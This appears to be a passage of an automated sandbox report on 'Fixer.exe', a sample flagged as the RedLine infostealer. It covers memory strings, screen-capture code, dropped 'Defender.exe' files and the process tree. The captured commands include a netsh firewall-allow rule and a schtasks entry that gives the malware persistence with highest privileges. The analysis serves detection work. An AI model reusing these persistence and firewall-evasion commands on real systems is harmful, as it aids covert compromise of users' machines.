                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                  Source: Amcache.hve.14.drString found in binary or memory: http://upx.sf.net
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: Fixer.exeString found in binary or memory: https://api.ip.sb/ip
                  Source: Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: https://d.symcb.com/cps0%
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: https://d.symcb.com/rpa0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: https://d.symcb.com/rpa0.
                  Source: Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture screen (.Net source)
                  Source: 6z9uno0baqvej0me.exe.0.dr, BeNEQBpvCUYMUQvO.cs.Net Code: kgykxlqrmnxrTJvFK
                  Source: FixerNerest.exe.0.dr, QEEFRJhvySTxMB.cs.Net Code: zZqXIBvmIbEvDhSnLgO
                  Source: Defender.exe.4.dr, QEEFRJhvySTxMB.cs.Net Code: zZqXIBvmIbEvDhSnLgO

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: Fixer.exe, type: SAMPLEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.0.Fixer.exe.fd0000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Drops large PE files
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeFile dump: Defender.exe.4.dr 750130408Jump to dropped file
                  Source: C:\Windows\System32\Defender.exeCode function: 17_2_00007FF848F317CD NtProtectVirtualMemory,17_2_00007FF848F317CD
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeFile created: C:\Windows\System32\Defender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_0194DC740_2_0194DC74
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F2C8B23_2_00007FF848F2C8B2
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F2BB023_2_00007FF848F2BB02
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F27F303_2_00007FF848F27F30
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F20DFA3_2_00007FF848F20DFA
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F255183_2_00007FF848F25518
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F20D6D3_2_00007FF848F20D6D
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F20DD33_2_00007FF848F20DD3
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F27AB43_2_00007FF848F27AB4
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 4_2_00007FF848F3D5924_2_00007FF848F3D592
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 4_2_00007FF848F382FB4_2_00007FF848F382FB
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 4_2_00007FF848F3C7E64_2_00007FF848F3C7E6
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 4_2_00007FF848F352284_2_00007FF848F35228
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeCode function: 4_2_00007FF848F38E304_2_00007FF848F38E30
                  Source: C:\Windows\System32\Defender.exeCode function: 11_2_00007FF848F2D59211_2_00007FF848F2D592
                  Source: C:\Windows\System32\Defender.exeCode function: 11_2_00007FF848F2833A11_2_00007FF848F2833A
                  Source: C:\Windows\System32\Defender.exeCode function: 11_2_00007FF848F2C7E611_2_00007FF848F2C7E6
                  Source: C:\Windows\System32\Defender.exeCode function: 11_2_00007FF848F2522811_2_00007FF848F25228
                  Source: C:\Windows\System32\Defender.exeCode function: 11_2_00007FF848F28B5611_2_00007FF848F28B56
                  Source: C:\Windows\System32\Defender.exeCode function: 17_2_00007FF848F28E4017_2_00007FF848F28E40
                  Source: C:\Windows\System32\Defender.exeCode function: 17_2_00007FF848F2D59217_2_00007FF848F2D592
                  Source: C:\Windows\System32\Defender.exeCode function: 17_2_00007FF848F2833A17_2_00007FF848F2833A
                  Source: C:\Windows\System32\Defender.exeCode function: 17_2_00007FF848F2C7E617_2_00007FF848F2C7E6
                  Source: C:\Windows\System32\Defender.exeCode function: 17_2_00007FF848F2522817_2_00007FF848F25228
                  Source: C:\Windows\System32\Defender.exeCode function: 17_2_00007FF848F28B5617_2_00007FF848F28B56
                  Source: C:\Windows\System32\Defender.exeCode function: 17_2_00007FF848F30F8D17_2_00007FF848F30F8D
                  Source: C:\Windows\System32\Defender.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1684 -s 1244
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSecurityHealthSystrayj% vs Fixer.exe
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameexplorerr) vs Fixer.exe
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Fixer.exe
                  Source: Fixer.exe, 00000000.00000000.1999992726.0000000001016000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSteanings.exe8 vs Fixer.exe
                  Source: Fixer.exe, 00000000.00000002.2201510658.000000000173E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Fixer.exe
                  Source: Fixer.exeBinary or memory string: OriginalFilenameSteanings.exe8 vs Fixer.exe
                  Source: Fixer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Fixer.exe, type: SAMPLEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.0.Fixer.exe.fd0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: FixerNerest.exe.0.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.GetAccessControl
                  Source: FixerNerest.exe.0.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.SetAccessControl
                  Source: 6z9uno0baqvej0me.exe.0.dr, YCqdhaRTimJInloXKuRkyyz.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 6z9uno0baqvej0me.exe.0.dr, YCqdhaRTimJInloXKuRkyyz.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: Defender.exe.4.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.GetAccessControl
                  Source: Defender.exe.4.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.SetAccessControl
                  Source: Defender.exe.4.dr, lXExsaLrgYgEOOXK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: Defender.exe.4.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.GetAccessControl
                  Source: Defender.exe.4.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.SetAccessControl
                  Source: 6z9uno0baqvej0me.exe.0.dr, sMngcJoYCfD.csSecurity API names: File.GetAccessControl
                  Source: 6z9uno0baqvej0me.exe.0.dr, sMngcJoYCfD.csSecurity API names: File.SetAccessControl
                  Source: FixerNerest.exe.0.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: FixerNerest.exe.0.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.GetAccessControl
                  Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.SetAccessControl
                  Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: Defender.exe.4.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: Defender.exe.4.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.csSecurity API names: File.GetAccessControl
                  Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.csSecurity API names: File.SetAccessControl
                  Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/14@1/2
                  Source: C:\Users\user\Desktop\Fixer.exeFile created: C:\Users\user\AppData\Local\SystemCacheJump to behavior
                  Source: C:\Windows\System32\Defender.exeMutant created: NULL
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4284
                  Source: C:\Windows\System32\Defender.exeMutant created: \Sessions\1\BaseNamedObjects\kkepmy41u(qg%$l6
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1684
                  Source: C:\Users\user\Desktop\Fixer.exeFile created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeJump to behavior
                  Source: Fixer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Fixer.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Fixer.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Fixer.exeVirustotal: Detection: 73%
                  Source: Fixer.exeReversingLabs: Detection: 68%
                  Source: unknownProcess created: C:\Users\user\Desktop\Fixer.exe "C:\Users\user\Desktop\Fixer.exe"
                  Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe"
                  Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe "C:\Users\user\AppData\Local\Temp\FixerNerest.exe"
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                  Source: unknownProcess created: C:\Windows\System32\Defender.exe C:\Windows\System32\Defender.exe
                  Source: C:\Windows\System32\Defender.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1684 -s 1244
                  Source: unknownProcess created: C:\Windows\System32\Defender.exe C:\Windows\System32\Defender.exe
                  Source: C:\Windows\System32\Defender.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4284 -s 1360
                  Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe "C:\Users\user\AppData\Local\Temp\FixerNerest.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exitJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exitJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
